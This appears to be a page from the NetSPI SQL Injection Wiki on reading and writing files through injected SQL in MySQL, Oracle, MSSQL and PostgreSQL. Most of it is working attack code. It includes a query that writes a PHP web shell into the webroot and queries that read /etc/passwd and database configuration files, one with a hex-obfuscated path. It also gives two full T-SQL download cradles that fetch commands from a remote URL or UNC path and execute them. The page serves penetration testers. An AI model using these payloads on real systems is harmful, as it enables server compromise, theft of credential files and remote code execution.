Home Original page

NetSPI SQL Injection Wiki

Reading and Writing Files

Reading and writing to files aids in data gathering as well as data exfiltration. Many methods include writing to the webroot, which enables a web shell to be executed, or allowing data to be exfiltrated over port 80/443.

* Requires privileged user

Description Query
Dump to file SELECT * FROM mytable INTO dumpfile '/tmp/somefile'
Dump PHP Shell SELECT 'system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'
Read File SELECT LOAD_FILE('/etc/passwd')
Read File Obfuscated SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
reads c:\boot.ini
File Privileges SELECT file_priv FROM mysql.user WHERE user = 'netspi'
SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%netspi%'

Reading and Writing Files

Reading and writing to files aids in data gathering as well as data exfiltration. Many methods include writing to the webroot, which enables a web shell to be executed, or allowing data to be exfiltrated over port 80/443.

UTL_FILE can sometimes be used. Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';

Java can be used to read and write files if it's installed (it is not available in Oracle Express).

Reading and Writing Files

Reading and writing to files aids in data gathering as well as data exfiltration. Many methods include writing to the webroot, which enables a web shell to be executed, or allowing data to be exfiltrated over port 80/443.

* Requires privileged user

Description Query
Download Cradle bulk in server - TSQL -- Bulk Insert - Download Cradle Example

-- Setup variables
Declare @cmd varchar(8000)

-- Create temp table
CREATE TABLE #file (content nvarchar(4000));

-- Read file into temp table - web server must support propfind
BULK INSERT #file FROM '\\sharepoint.acme.com@SSL\Path\to\file.txt';

-- Select contents of file
SELECT @cmd = content FROM #file

-- Display command
SELECT @cmd

-- Run command
EXECUTE(@cmd)

-- Drop the temp table
DROP TABLE #file
Download Cradle OAP 1 - TSQL -- OLE Automation Procedure - Download Cradle Example
-- Does not require a table, but can't handle larger payloads

-- Note: This also works with unc paths \\ip\file.txt
-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind.

-- Setup Variables
DECLARE @url varchar(300)
DECLARE @WinHTTP int
DECLARE @handle int
DECLARE @Command varchar(8000)

-- Set target url containting TSQL
SET @url = 'http://127.0.0.1/mycmd.txt'

-- Setup namespace
EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT

-- Call the Open method to setup the HTTP request
EXEC @handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'

-- Call the Send method to send the HTTP GET request
EXEC @handle=sp_OAMethod @WinHTTP,'Send'

-- Capture the HTTP response content
EXEC @handle=sp_OAGetProperty @WinHTTP,'ResponseText', @Command out

-- Destroy the object
EXEC @handle=sp_OADestroy @WinHTTP

-- Display command
SELECT @Command

-- Run command
EXECUTE (@Command)
Download Cradle OAP 2 - TSQL -- OLE Automation Procedure - Download Cradle Example - Option 2
-- Can handle larger payloads, but requires a table

-- Note: This also works with unc paths \\ip\file.txt
-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind.

-- Setup Variables
DECLARE @url varchar(300)
DECLARE @WinHTTP int
DECLARE @Handle int
DECLARE @Command varchar(8000)

-- Set target url containting TSQL
SET @url = 'http://127.0.0.1/mycmd.txt'

-- Create temp table to store downloaded string
CREATE TABLE #text(html text NULL)

-- Setup namespace
EXEC @Handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT

-- Call open method to configure HTTP request
EXEC @Handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'

-- Call Send method to send the HTTP request
EXEC @Handle=sp_OAMethod @WinHTTP,'Send'

-- Capture the HTTP response content
INSERT #text(html)
EXEC @Handle=sp_OAGetProperty @WinHTTP,'ResponseText'

-- Destroy the object
EXEC @Handle=sp_OADestroy @WinHTTP

-- Display the commad
SELECT @Command = html from #text
SELECT @Command

-- Run the command
EXECUTE (@Command)

-- Remove temp table
DROP TABLE #text
Reading Files - TSQL https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql
Writing Files - TSQL https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql

Reading and Writing Files

Reading and writing to files aids in data gathering as well as data exfiltration. Many methods include writing to the webroot, which enables a web shell to be executed, or allowing data to be exfiltrated over port 80/443.

* Requires privileged user

Description Query
Read Files from Operating System - COPY CREATE TABLE mydata(t text);
COPY mydata FROM '/etc/passwd';
SELECT * FROM mydata;
DROP TABLE mytest mytest;
Read Files from Operating System - pg_read_file SELECT pg_read_file('/usr/local/pgsql/data/pg_hba.conf', 0, 200);
Writing Files from Operating System CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('');
COPY mytable (mycol) TO '/var/www/test.php';